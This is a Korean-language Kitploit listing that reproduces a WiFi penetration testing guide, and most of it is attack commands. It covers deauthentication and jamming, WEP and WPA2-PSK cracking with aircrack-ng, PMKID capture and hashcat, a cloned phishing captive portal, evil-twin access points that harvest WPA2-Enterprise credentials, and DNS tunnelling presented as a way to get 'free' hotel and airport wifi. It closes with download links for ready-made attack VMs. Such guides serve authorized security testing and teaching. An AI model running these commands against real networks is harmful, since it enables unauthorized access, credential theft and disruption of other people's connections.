Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
wifi-pentesting-guide — WiFi 침투 테스트 가이드 | Kitploit
도구/GitHubGitHub/ricardojoserf/wifi-pentesting-guide
Password CrackingWi-Fi AuditingInformation GatheringPost-ExploitationWireless SecurityPenetration TestingSocial EngineeringLearning & Education
GitHubricardojoserf/wifi-pentesting-guide

wifi-pentesting-guide

WiFi 침투 테스트 가이드

저장소 보기
7341132년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

WiFi 침투 테스트 가이드

목차

  1. 기본 명령어

  2. 개방형 네트워크

    2.1. 캡티브 포털

    2.2. 중간자 공격

  3. WEP 크래킹

    3.1. 클라이언트 없음

  4. WPA2-PSK 크래킹

    4.1. 4-way 핸드셰이크 크래킹

    4.2. PMKID 공격

    4.3. AP 없는 공격

  5. WPA2-엔터프라이즈

    5.1. 가짜 액세스 포인트

    5.2. 무차별 대입

    5.3. 지원되는 EAP 방법

  6. 기타 공격

    6.1. Krack 공격 및 Frag 공격

    6.2. OSINT

    6.3. 와이파이 재밍

    6.4. 기타 프레임워크

  7. 사후 공격

    7.1. 라우터 공격

    7.2. 스캐너 유형

    7.3. 스푸핑



1. 기본 명령어

환경 변수 설정

root@kitploit:~
VARIABLE=value

인터페이스 모드 확인

root@kitploit:~
iwconfig $IFACE

인터페이스 상태 확인

root@kitploit:~
ifconfig $IFACE

모니터 모드 설정

root@kitploit:~
airmon-ng check kill
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up

네트워크 목록

  1. 모니터 모드 설정

  2. Airodump-ng 실행

root@kitploit:~
airodump-ng $IFACE -c $CHANNEL -e $ESSID

인증 해제

  1. 하나의 클라이언트만
root@kitploit:~
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
  1. 액세스 포인트 (= AP의 모든 클라이언트)
root@kitploit:~
 aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE

클라이언트가 있는 숨겨진 SSID 얻기

  1. 네트워크 목록 확인

Airodump-ng를 사용하여 네트워크를 나열하고 AP의 MAC 주소($AP_MAC)와 클라이언트 중 하나의 MAC 주소($CLIENT_MAC)를 얻습니다. 캡처를 중지하지 마십시오.

  1. 인증 해제

다른 터미널에서 하나의 클라이언트 또는 모든 클라이언트를 인증 해제합니다. Airodump-ng가 이 네트워크로부터 핸드셰이크를 캡처하면 첫 번째 터미널에 이름 또는 ESSID가 나타납니다:

root@kitploit:~
aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE

클라이언트 없이 숨겨진 SSID 얻기

  1. 네트워크 목록 확인

Airodump-ng를 사용하여 네트워크를 나열하고 AP의 MAC 주소($AP_MAC)와 클라이언트 중 하나의 MAC 주소($CLIENT_MAC)를 얻습니다. 캡처를 중지하지 마십시오.

2.a. 사전 공격 실행

root@kitploit:~
mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH

2.b. 또는 무차별 대입 공격 실행

root@kitploit:~
mdk3 $IFACE p -t $AP_MAC -с $AP_CHANNEL -b $CHARACTER_SET

문자 집합으로 l (소문자), u (대문자), n (숫자), c (소문자+대문자), m (소문자+대문자+숫자) 또는 a (모든 인쇄 가능 문자)를 사용할 수 있습니다.



2. 개방형 네트워크

2.1. 캡티브 포털

2.1.1. 가짜 캡티브 포털

  1. HTTrack을 사용하여 웹사이트 클론

  2. Wifiphiser를 설치합니다. HTTrack 결과를 wifiphisher/data/phishing-pages/new_page/html의 새 폴더에 추가하고 설정 파일을 wifiphisher/data/phishing-pages/new_page/config.ini에 추가합니다.

  3. python setup.py install 또는 bin의 바이너리를 사용하여 프로젝트를 다시 컴파일합니다.

  4. 다음 명령어는 hostapd를 설치한 후 최신 Kali 릴리스에서 올바르게 작동합니다:

root@kitploit:~
cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE

2.1.2. 우회 1: MAC 스푸핑

캡티브 포털을 우회하는 첫 번째 방법은 이미 인증된 사용자의 MAC 주소로 변경하는 것입니다.

  1. 네트워크를 스캔하고 IP 및 MAC 주소 목록을 얻습니다. 다음을 사용할 수 있습니다:
  • nmap

  • 이 스크립트 (Bash) 또는 이 스크립트 (Python) 같은 사용자 정의 스크립트

  1. IP 및 MAC 주소를 변경합니다. 다음을 사용할 수 있습니다:
  • macchanger

  • 이 스크립트(Bash) 같은 사용자 정의 스크립트

또한 다음과 같은 스크립트를 사용하여 프로세스를 자동화할 수 있습니다:

  • Poliva 스크립트

  • Hackcaptiveportals


2.1.3. 우회 2: DNS 터널링

두 번째 방법은 DNS 터널을 생성하는 것입니다. 이를 위해서는 접근 가능한 자신의 DNS 서버가 필요합니다. 이 방법을 사용하면 호텔, 공항 등에서 캡티브 포털을 우회하고 '무료' 와이파이를 얻을 수 있습니다.

  1. 도메인 이름이 확인되는지 확인:
root@kitploit:~
nslookup example.com
  1. 두 개의 DNS 레코드를 생성합니다 (Digital ocean, Afraid.org 등에서):
  • 하나의 'A 레코드': dns.$DOMAIN이 $SERVER_IP를 가리킴 (예: dns.domain.com 139.59.172.117)

  • 하나의 'NS 레코드': hack.$DOMAIN이 dns.$DOMAIN을 가리킴 (예: hack.domain.com dns.domain.com)

  1. 서버에서 실행
root@kitploit:~
iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
  1. 여기에서 올바르게 작동하는지 확인

  2. 클라이언트에서 실행

root@kitploit:~
iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
  1. 터널 생성
root@kitploit:~
ssh -D 8080 [email protected]

2.2. 중간자 공격

네트워크에 연결되면 중간자 공격에 취약한지 테스트할 수 있습니다.

  1. Ettercap을 사용한 ARP 스푸핑 공격

  2. Wireshark 또는 TCPdump를 사용하여 트래픽 스니핑

  3. PCredz (Linux) 또는 Network Miner (Windows)를 사용하여 트래픽 분석



3. WEP 크래킹

  1. 캡처 시작
root@kitploit:~
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. 가짜 인증 + ARP 요청 재전송 공격 + 사용자 인증 해제를 사용하여 IV 캡처를 가속화합니다. 약 100,000개의 다른 IV에서 Airodump를 중지합니다.
root@kitploit:~
aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. Aircrack-ng를 사용하여 비밀번호 크래킹
root@kitploit:~
aircrack-ng $PCAP_FILE


4. WPA2-PSK 크래킹

4.1. 4-way 핸드셰이크 크래킹

  1. 캡처 시작
root@kitploit:~
airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
  1. 사용자를 인증 해제합니다. 'WPA handshake: $MAC' 메시지가 보이면 airodump 캡처를 중지합니다.
root@kitploit:~
aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
  1. 옵션 1: Aircrack-ng를 사용하여 핸드셰이크 크래킹
root@kitploit:~
aircrack-ng -w $WORDLIST capture.cap

워드리스트는 여기에서 얻을 수 있습니다.

  1. 옵션 2: Pyrit을 사용하여 핸드셰이크 크래킹
root@kitploit:~
pyrit -r $PCAP_FILE analyze
pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
pyrit -i $WORDLIST import_passwords
pyrit eval
pyrit batch
pyrit -r $CLEAN_PCAP_FILE attack_db

4.2. PMKID 공격

이 스크립트를 사용하거나 다음 단계를 따르십시오:

  1. Hcxdumptool과 Hcxtool을 설치합니다 (이 스크립트를 사용할 수 있습니다).

  2. 네트워크 매니저 중지

root@kitploit:~
airmon-ng check kill

3a. 특정 MAC 주소를 공격하려면

  • 텍스트 파일($FILTER_FILE)을 만들고 콜론 없이 MAC 주소를 추가합니다. sed를 사용하여 출력을 파일로 리디렉션할 수 있습니다:
root@kitploit:~
echo $MAC | sed 's/://g' > $FILTER_FILE
  • PMKID 캡처
root@kitploit:~
hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
  1. $HASH_FILE 생성
root@kitploit:~
hcxpcaptool -z $HASH_FILE $PCAPNG_FILE

각 줄의 구조는: PMKID * 라우터 MAC * 스테이션 * ESSID입니다 (https://www.rapidtables.com/convert/number/hex-to-ascii.html 참조).

  1. Hashcat을 사용하여 크래킹 (옵션 16800)
root@kitploit:~
hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force

4.3. AP 없는 공격

와이파이 연결이 켜져 있지만 주변에 네트워크가 없는 클라이언트 장치에 접근할 수 있는 경우, 클라이언트 장치가 이전에 해당 네트워크에 연결한 적이 있다면 여전히 그 네트워크를 공격할 수 있습니다.

이를 위해 이 파일과 같은 설정 파일을 사용하여 hostpad로 가짜 액세스 포인트를 생성해야 합니다. 비밀번호는 무엇이든 상관없지만 네트워크 이름은 동일해야 합니다. 가짜 네트워크를 만들면 클라이언트 장치가 연결을 시도하고 이 가이드의 4.1 섹션에서 설명한 대로 4-way 핸드셰이크를 얻을 수 있습니다.



5. WPA2-엔터프라이즈

5.1 가짜 액세스 포인트

가상 머신 다운로드

로컬 설치

가상 머신을 사용하고 싶지 않다면 다음을 사용하여 모든 것을 설치할 수 있습니다:

root@kitploit:~
git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack

cd WPA_Enterprise_Attack && sudo sh install.sh

Hostapd 및 Freeradius-wpe

다음을 사용하여 액세스 포인트 시작:

root@kitploit:~
sh freeradius_wpe_init.sh $AP_NAME $INTERFACE

클라이언트가 연결되면 다음을 사용하여 로그를 읽습니다:

root@kitploit:~
sh freeradius_wpe_read.sh

Hostapd-wpe

root@kitploit:~
sh hostapd_wpe_init.sh $AP_NAME $INTERFACE

5.2 무차별 대입

  • Airhammer

5.3 지원되는 EAP 방법

지원되는 EAP 방법 찾기

  • EAP_buster


6. 기타 공격

6.1. Krack 공격 및 Frag 공격

이는 위대한 Mathy Vanhoef가 발견한 두 가지 고급 공격입니다:

  • Krack Attack Scripts - 이 웹사이트에 설명됨

  • Frag Attack Scripts - 이 웹사이트에 설명됨

6.2. OSINT

  • Wigle

6.3. 와이파이 재밍

  • Wifijammer - 이 프로그램은 AP와 클라이언트 모두에게 인증 해제 패킷을 보낼 수 있습니다.

가짜 액세스 포인트를 제외한 모든 장치를 인증 해제하는 예:

root@kitploit:~
sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC

6.4. 기타 프레임워크

리눅스:

  • Sniffair
  • Wifi Pumpkin - Rogue WiFi 액세스 포인트 공격용 프레임워크
  • Eaphammer - 가짜 액세스 포인트용 프레임워크
  • WEF - WPA/WPA2 및 WEP에 대한 다양한 유형의 공격, 자동 해시 크래킹 등을 위한 프레임워크

윈도우:

  • Acrylic - 정찰 단계에 유용
  • Ekahau - Wi-Fi 계획에 유용
  • Vistumbler - 워드라이빙에 유용


7. 사후 공격

네트워크에 연결되면

7.1. 라우터 공격

  • Routersploit - 임베디드 장치용 익스플로잇 프레임워크 - "use scanners/autopwn" 테스트

7.2. 스캐너 유형

  • Nmap/Zenmap - 보안 스캐너, 포트 스캐너 및 네트워크 탐색 도구

  • Masscan - nmap의 더 빠른 버전 (문제를 일으킬 수 있으니 주의)

  • Netdiscover - ARP 스니핑. 네트워크가 매우 잘 분할된 경우 유용

7.3. 스푸핑

  • Ettercap - MitM 공격을 수행하고 네트워크의 모든 트래픽을 스니핑할 수 있는지 확인
도구 다운로드
운영 체제플랫폼인증 정보크기링크
Ubuntu 16.04.5VMwarericardojoserf:wifi3.25 GBMEGA
Kali 2019.1VMwareroot:wifi4.99 GBMEGA
Ubuntu 16.04.5VirtualBox (OVA)ricardojoserf:wifi3.18 GBMEGA
Kali 2019.1VirtualBox (OVA)root:wifi5.56 GBMEGA